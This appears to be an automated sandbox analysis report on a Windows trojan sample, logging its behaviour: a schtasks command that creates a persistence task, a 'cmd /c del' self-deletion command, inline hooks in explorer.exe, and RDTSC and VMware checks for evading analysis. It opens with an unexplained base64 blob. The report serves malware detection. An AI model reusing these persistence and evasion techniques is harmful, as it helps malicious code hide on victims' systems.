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
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@2/1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,15_2_011DC5CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011FA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,15_2_011FA0D2
          Source: C:\Users\user\Desktop\PO07262021.exeFile created: C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2388:120:WilError_01
          Source: C:\Users\user\Desktop\PO07262021.exeMutant created: \Sessions\1\BaseNamedObjects\fKCtYnPDseQYKUqQUyihPKJYaez
          Source: C:\Users\user\Desktop\PO07262021.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB7D9.tmpJump to behavior
          Source: PO07262021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO07262021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO07262021.exeVirustotal: Detection: 58%
          Source: PO07262021.exeReversingLabs: Detection: 73%
          Source: C:\Users\user\Desktop\PO07262021.exeFile read: C:\Users\user\Desktop\PO07262021.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO07262021.exe 'C:\Users\user\Desktop\PO07262021.exe'
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Users\user\Desktop\PO07262021.exe C:\Users\user\Desktop\PO07262021.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO07262021.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Users\user\Desktop\PO07262021.exe C:\Users\user\Desktop\PO07262021.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO07262021.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: PO07262021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO07262021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.752806137.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO07262021.exe, 00000007.00000002.767621920.0000000001190000.00000040.00000001.sdmp, cmd.exe, 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: PO07262021.exe, 00000007.00000002.768387188.00000000014E0000.00000040.00000001.sdmp, cmd.exe, 0000000F.00000000.765256590.00000000011D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO07262021.exe, 00000007.00000002.767621920.0000000001190000.00000040.00000001.sdmp, cmd.exe
          Source: Binary string: cmd.pdb source: PO07262021.exe, 00000007.00000002.768387188.00000000014E0000.00000040.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.752806137.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041703E push esi; iretd 7_2_0041704D
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041E36F push ecx; iretd 7_2_0041E380
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041E3D4 push FBA9C29Ch; ret 7_2_0041E3DB
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00417596 push esp; iretd 7_2_004175CC
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_004175A0 push esp; iretd 7_2_004175CC
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041CEB5 push eax; ret 7_2_0041CF08
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041CF6C push eax; ret 7_2_0041CF72
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041CF02 push eax; ret 7_2_0041CF08
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0041CF0B push eax; ret 7_2_0041CF72
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00416FD2 push 00000035h; retf 7_2_00416FD8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E76BD push ecx; ret 15_2_011E76D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E76D1 push ecx; ret 15_2_011E76E4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ABD0D1 push ecx; ret 15_2_03ABD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 6.94520727658
          Source: initial sampleStatic PE information: section name: .text entropy: 6.94520727658
          Source: C:\Users\user\Desktop\PO07262021.exeFile created: C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\PO07262021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO07262021.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO07262021.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000010598E4 second address: 00000000010598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000001059B5E second address: 0000000001059B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00409A90 rdtsc 7_2_00409A90
          Source: C:\Users\user\Desktop\PO07262021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exe TID: 6692Thread sleep time: -46734s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exe TID: 6716Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5968Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4984Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,15_2_011F31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_011D85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_011E245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_011DB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_011E68BA
          Source: C:\Users\user\Desktop\PO07262021.exeThread delayed: delay time: 46734Jump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000009.00000000.752500086.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000009.00000000.722521161.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.718856258.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.722521161.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.713227262.0000000004791000.00000004.00000001.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
          Source: explorer.exe, 00000009.00000000.713177380.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000009.00000000.752500086.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000009.00000000.722572636.000000000A64D000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA~
          Source: explorer.exe, 00000009.00000000.722788045.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000009.00000000.752500086.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000009.00000000.722870452.000000000A782000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000009.00000000.752500086.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO07262021.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_00409A90 rdtsc 7_2_00409A90
          Source: C:\Users\user\Desktop\PO07262021.exeCode function: 7_2_0040ACD0 LdrLoadDll,7_2_0040ACD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011F2258 IsDebuggerPresent,15_2_011F2258
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_011FB5E0 mov eax, dword ptr fs:[00000030h]15_2_011FB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A94BAD mov eax, dword ptr fs:[00000030h]15_2_03A94BAD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A94BAD mov eax, dword ptr fs:[00000030h]15_2_03A94BAD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A94BAD mov eax, dword ptr fs:[00000030h]15_2_03A94BAD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B35BA5 mov eax, dword ptr fs:[00000030h]15_2_03B35BA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A71B8F mov eax, dword ptr fs:[00000030h]15_2_03A71B8F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A71B8F mov eax, dword ptr fs:[00000030h]15_2_03A71B8F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1D380 mov ecx, dword ptr fs:[00000030h]15_2_03B1D380
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A78794 mov eax, dword ptr fs:[00000030h]15_2_03A78794
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B2138A mov eax, dword ptr fs:[00000030h]15_2_03B2138A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9B390 mov eax, dword ptr fs:[00000030h]15_2_03A9B390
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7794 mov eax, dword ptr fs:[00000030h]15_2_03AE7794
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7794 mov eax, dword ptr fs:[00000030h]15_2_03AE7794
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7794 mov eax, dword ptr fs:[00000030h]15_2_03AE7794
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A92397 mov eax, dword ptr fs:[00000030h]15_2_03A92397
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8DBE9 mov eax, dword ptr fs:[00000030h]15_2_03A8DBE9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A903E2 mov eax, dword ptr fs:[00000030h]15_2_03A903E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A903E2 mov eax, dword ptr fs:[00000030h]15_2_03A903E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A903E2 mov eax, dword ptr fs:[00000030h]15_2_03A903E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A903E2 mov eax, dword ptr fs:[00000030h]15_2_03A903E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A903E2 mov eax, dword ptr fs:[00000030h]15_2_03A903E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A903E2 mov eax, dword ptr fs:[00000030h]15_2_03A903E2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AA37F5 mov eax, dword ptr fs:[00000030h]15_2_03AA37F5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE53CA mov eax, dword ptr fs:[00000030h]15_2_03AE53CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE53CA mov eax, dword ptr fs:[00000030h]15_2_03AE53CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A64F2E mov eax, dword ptr fs:[00000030h]15_2_03A64F2E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A64F2E mov eax, dword ptr fs:[00000030h]15_2_03A64F2E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9E730 mov eax, dword ptr fs:[00000030h]15_2_03A9E730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9A70E mov eax, dword ptr fs:[00000030h]15_2_03A9A70E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A9A70E mov eax, dword ptr fs:[00000030h]15_2_03A9A70E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B2131B mov eax, dword ptr fs:[00000030h]15_2_03B2131B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B3070D mov eax, dword ptr fs:[00000030h]15_2_03B3070D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B3070D mov eax, dword ptr fs:[00000030h]15_2_03B3070D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A8F716 mov eax, dword ptr fs:[00000030h]15_2_03A8F716
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFFF10 mov eax, dword ptr fs:[00000030h]15_2_03AFFF10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFFF10 mov eax, dword ptr fs:[00000030h]15_2_03AFFF10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6DB60 mov ecx, dword ptr fs:[00000030h]15_2_03A6DB60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7FF60 mov eax, dword ptr fs:[00000030h]15_2_03A7FF60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A93B7A mov eax, dword ptr fs:[00000030h]15_2_03A93B7A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A93B7A mov eax, dword ptr fs:[00000030h]15_2_03A93B7A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B38F6A mov eax, dword ptr fs:[00000030h]15_2_03B38F6A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6DB40 mov eax, dword ptr fs:[00000030h]15_2_03A6DB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A7EF40 mov eax, dword ptr fs:[00000030h]15_2_03A7EF40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B38B58 mov eax, dword ptr fs:[00000030h]15_2_03B38B58
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A6F358 mov eax, dword ptr fs:[00000030h]15_2_03A6F358
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A652A5 mov eax, dword ptr fs:[00000030h]15_2_03A652A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A652A5 mov eax, dword ptr fs:[00000030h]15_2_03A652A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A652A5 mov eax, dword ptr fs:[00000030h]15_2_03A652A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A652A5 mov eax, dword ptr fs:[00000030h]15_2_03A652A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03A652A5 mov eax, dword ptr fs:[00000030h]15_2_03A652A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE46A7 mov eax, dword ptr fs:[00000030h]15_2_03AE46A7
